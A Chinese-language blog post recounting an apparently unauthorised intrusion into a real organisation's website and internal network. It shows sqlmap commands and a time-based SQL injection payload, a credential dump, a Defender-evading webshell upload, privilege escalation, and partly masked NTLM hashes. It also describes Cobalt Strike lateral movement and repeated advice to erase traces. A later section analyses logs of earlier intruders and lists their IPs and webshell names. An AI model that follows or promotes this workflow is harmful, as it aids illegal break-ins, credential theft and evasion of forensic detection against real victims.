记一次SQL注入引发的日志分析案例

‍0x01 前言

平时喜欢打战练手,所以才有此文章,写的比较水。如果写的不好的地方,还请各位师傅指点。

0x02 外网渗透

  通过awvs,发现存在注入一枚,sqlmap一把梭哈,没梭哈成功的说明姿势不对

sqlmap -r 222.txt --batch --random-agent --force-ssl --current-db

image-20230116142003066

  跑出来的注入类型还挺多的

Parameter: MULTIPART #1* ((custom) POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="__VIEWSTATE"

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="__VIEWSTATE"


    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ------------YWJkMTQzNDcw


    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: ------------YWJkMTQzNDcw

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$c_email"

-1' WAITFOR DELAY '0:0:5'-- diLH
------------YWJkMTQzNDcw--

  

  可以os-shell(不过我这个图是后补的,入口是朋友打的,我就没看)

  ​image

 ‍

  数据库为sqlserver,尝试读取网站后台账户密码

sqlmap -r 222.txt --batch --random-agent --force-ssl -D ein -T Apply_user --dump --start=1 --stop=10 

image-20230116144216477

  虽然读出来了,但是好几个用户登录不进去,一个一个尝试发现了一个用户可以登录后台

  ‍

  ‍

  登录后台

image-20230116144304784

  ‍

  ‍

  ‍

  ‍

  在后台寻找上传的功能点,疑似发现一个上传点

image-20230116144335356

  ‍ 

  发现了好几个上传点,但是都不回显路径。后台在最下面的档案上传找到了回显位置(目标及其上有defender,这里还折腾了一会。可通过github上的生成器,生成一个马儿,这样可以过defender)

image-20230116144524224

  ‍

  上传webshell成功获取路径

 image-20230116155341949

  ‍

0x03 内网渗透

  因为是iis启动的,所以权限比较低,通过哥斯拉的shellcode加载上线

image-20230116144636174

  ​​

  通过烂土豆直接提权

image-20230116144700814

image-20230116144730805

  由于目标的操作系统是win2016,所以无法抓到明文密码

	 * Username : fxxxxdm
	 * Domain   : ExxxxEB
	 * NTLM     : f5f070xxxxxf714ca44e
	 * SHA1     : 7064xxxxxxx1f0e47f183b


	 * Username : pxxxxck	
	 * Domain   : EIN-WEB
	 * NTLM     : 1ecd8xxxxx5af5cd672a9a
	 * SHA1     : c44812axxxeda558ea7509f23c8

  ‍

定位网站路径,找一下数据库,一般是web.config

C:/web/ein/

  数据库配置文件

image-20230116144951765

  ‍

  朋友A又上传了frp,又对内网一波梭哈,拿着口令了内网的一个弱口令

image-20230116145121540

  通过MDUT直接执行命令,虽然权限比较低,但是问题不大

image-20230116145143902

  ‍

  查看了当前的用户,发现另外一个机器上也存在这几个用户,由于目标机器上开了防火墙和defender导致远程执行命令的工具用不了,那还是老老实实上线cs吧

image-20230116145225875

  ‍

  ‍

  原本想通过MDUT直接上传文件的,发现无法上传,那还是老老实实的通过certutil远程下载吧

image-20230116145248293

  ‍

  干完坏事记得擦屁股,

image-20230116145315191

  ‍

  成功上线192.168.88.51这台主机

image-20230116145342680

  ‍

  接着又是一顿dumphash,发现一个rdp的密码,不过连不上哎

image-20230116145407558

  内网也没啥东西,后面就没看了

  ‍

  ‍

  ‍

0x04 日志分析

  在浏览目标机器上的文件,发现存在被入侵的痕迹,那很好玩了,分析分析别人是怎么进来的,学习学习,取其精华去其糟粕。

  当前文件最早创建的时间为:2022/05/07

  ​image

  ‍

  下载目录里也存在一些文件,例如mimikatz,burp证书、fscan的扫描结果、sqlmap、mimikatz的结果

image-20230116145440599

  ‍

  ​image

  ‍

  ​image

  ‍看完以上这些东西,不是纯纯的大黑客吗,直呼牛逼

  ‍

  ‍

  查看了用户创建的时间,发现创建时间为:2022/5/7 下午03:19:30

  ​image

  ‍

  ‍

  大概整理一下信息

目标机器:windows 2016
中间件:iis 10
新建用户时间:2022/5/7 下午 03:19:30
iis日志路径:C:\inetpub\logs\LogFiles\W3SVC2

日志:2022/5/04---2022/07/01
将这段时间的日志拿出来

  ‍

  在分析日志之前,首先要去看一下黑客可能通过哪些方法获取目标权限,因为笔者也是通过漏洞进去的,所以得出两种漏洞

1.SQL注入(os-shell、获取后台密码)
2.文件上传

  ‍

  大概梳理一下现在接口的漏洞

注入接口:https://xxxxxx/xxxxtivity.aspx?area=1
登录接口:https://xxx.xxx.xxxx/login/Login.aspx
登录成功接口:https://xxx.xxx.xxxx/xxxxx.aspx
上传文件功能:https://xxx.xxx.xxxx/xxxxxin.aspx
上传接口:https://xxx.xxx.xxxx/login/xxxxx?id=1
上传之后的路径:https://xxx.xxx.xxxx/xxxxxx.aspx

  ‍

  目标新建用户的时间为2022.5.7,先将2022.5.6的日志拿出来看一下,发现172.104.167.181 ip请求了上传接口,接着把172.104.167.181的所有日志提取出来

image-20230116150651883

  ‍

  ‍

  通过查询日志可知,黑客通过文件上传漏洞上传完webshell

image-20230116150624615

  ‍

  ‍

  ‍

  通过https://www.ipshudi.com/172.104.167.181.htm​查询了172.104.167.181的ip地址,应该是代理服务器

  ​image

  ‍

  因为上传接口是后台的,所以肯定会有登录后台的操作,在2022-05-06 02:59:01​前发现黑客做了上传操作,那登录肯定是之前登录的,把上传webshell之前的日志拿出来分析

  通过查找login/Main.aspx​接口,发现疑似目标ip

image-20230116150342870

  ‍

  https://www.ipshudi.com/112.97.50.66.htm

  猜测这里黑客是没做代理的,这个大几率是他真实ip

  ​image

  ‍

  接着将该ip所有的日志都提取出来

  ‍

  大概梳理清楚了,黑客通过用户名密码登录后台,接着上传文件。这里就是一顿上传文件,执行命令

 image-20230116145737920

  ‍

  接着后面一直在通过bypasscfGUI.asp​执行命令,后面估计嫌麻烦,上传了大马

image-20230116145807073

  ‍

  接着又在上传文件操作数据库

image-20230116145829508

  ‍

  后面终于想起来上传菜刀马了,早上传不就没这么多事情了吗

image-20230116145857982

  ‍

  ‍

  不知道为啥,后面又上传了其他的马儿。后面一直用newfile.ashx在操作

image-20230116145921037

  ‍

  2022-05-06 14:56:59后面就没搞了,接着我们看5-07的日志,黑客从2022-05-07 03:57:07开始搞了,

image-20230116145950240

  ‍

  ‍

  猜测黑客搞不动了,找了其他的朋友来帮忙解决

image-20230116150020504

  这个估计也是代理ip

  ​image

  ‍

  又是一顿上传文件

image-20230116150044258

  ‍

  ​

  ​image

  ‍

  ‍

  看看那个人上传了哪些东西,后面上传了AnyDesk.exe用于远程连接,上传nps用于挂代理,还有提权工具等

  ​image

  ‍

  ‍

  ‍

  ‍

  ‍

  后面一直是52.56.45.177 ip在操作,大概的时间也是能对得上的。后面把源码脱下来,又是一顿扫描,发现在2022-05-05 17:54:32的时候已经被上传了马儿

image-20230116150133856

  ‍

  ‍

  继续分析一下52.56.45.177做的操作,大概就是登陆然后上传。

image-20230116150214147

  ‍

  ‍

0x05 总结

  我估计是,他朋友梭哈下来,然后丢给别人练手,他搞不定了,结果那个人又接着搞,然后上来一顿梭哈。

  后面的那个人是真的菜,光是上传文件就穿了十几个文件,菜是真的菜。

/xx/xxxxxxx/cmdline.aspx
/xx/xxxx/bypasscfGUI.asp
/xx/xxxx/1.asp
/xx/xxxx/fz1.asp
/xx/xxxxxx/dama.asp
/xx/xxxx/nc.aspx
/xx/xxxxx/database.asp
/xx/xxxx/MSSQL.asp
/xx/xxxx/pgod_sqlserver_manager.asp
/xx/xxxxxxxx/caidao1.asp
xx/xxxxxxxx/newfile.asp
/xx/xxxxxxx/newfile.

这个故事告诉我们,日站之后记得擦屁股,毕竟日站不规范,情人两行泪。